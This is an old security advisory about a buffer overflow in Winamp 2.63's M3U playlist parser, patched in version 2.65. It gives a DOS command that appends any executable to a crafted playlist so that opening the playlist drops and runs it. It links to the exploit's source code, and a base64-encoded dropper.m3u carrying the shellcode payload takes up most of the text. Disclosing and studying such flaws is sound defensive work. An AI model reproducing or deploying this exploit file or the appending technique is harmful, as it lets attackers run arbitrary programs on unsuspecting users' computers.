COMMAND

    WinAmp

SYSTEMS AFFECTED

    Winamp 2.63

PROBLEM

    'ByteRage'  found  following.   He  has  written a full disclosure
    buffer overflow exploit for the winamp 2.63 buffer overflow  found
    in the M3U file parser...  Attached is a file called  DROPPER.M3U,
    if you execute the following commands in dos:

        COPY /B DROPPER.M3U+C:\WINDOWS\CDPLAYER.EXE HACKME.M3U

    When you  click HACKME.M3U,  the file  will drop  and execute  the
    appended exe file, CDPLAYER.EXE in this case...

    The CPP source for creating DROPPER.M3U is at:

        http://elf.box.sk/byterage/wa263bof.cpp

    and more info can be got from

        http://elf.box.sk/byterage/wa263.htm

    This hasn't been tested yet on 2.64 or underlying versions, but if
    the versions  of IN_MOD.DLL  match, those  versions are vulnerable
    too...

    ---
    Content-Type: application/octet-stream; name="dropper.m3u"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="dropper.m3u"
    Content-MD5: Kjxu6Ci/fHfAvxuamfKQrA==

    I0VYVE0zVQ0KI0VYVElORjpYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
    WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
    WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
    WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
    WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
    WFhYWFhYWFhYWFhYWFhYWBCgERFYWFhYK4MREZCQM8BQNIBQagM0gFBqAzSAweAYUFP/FWiQ
    ERGL6DPJUVOxA8HhCFGDwwRTUP8VxJARETPJsX+AwX+DwW8D2f/TDQqQkFOL+4HD8wAAAIHH
    EgEAAFP/FVSQERGL8DPA10M8AHX4U1b/FViQERGrM8DXQzwAdfgzwNdDPAF01jwCdONoAEAA
    AGpA/1f4PQAAAAB0AJYzwFA0gFBqAjPAUFBoAAAAwFf/FWiQERE9/////3QAk2oAV2gAQAAA
    VlX/FcSQERGDPwB0D2oAV/83VlP/FdSQERHr3FP/FSiQERHHB1xFWFBqAVf/V/xqAP8VyJAR
    EZCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
    kJCQkJCQkJCQkJCQkJBLRVJORUwzMgBHbG9iYWxBbGxvYwACV2luRXhlYwAAAAAAAAAAAABc
    RVhQTE9JVC5FWEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAA

    -----

SOLUTION

    After checking the whatsnew.txt for Winamp, this security hole was
    patched in version 2.65.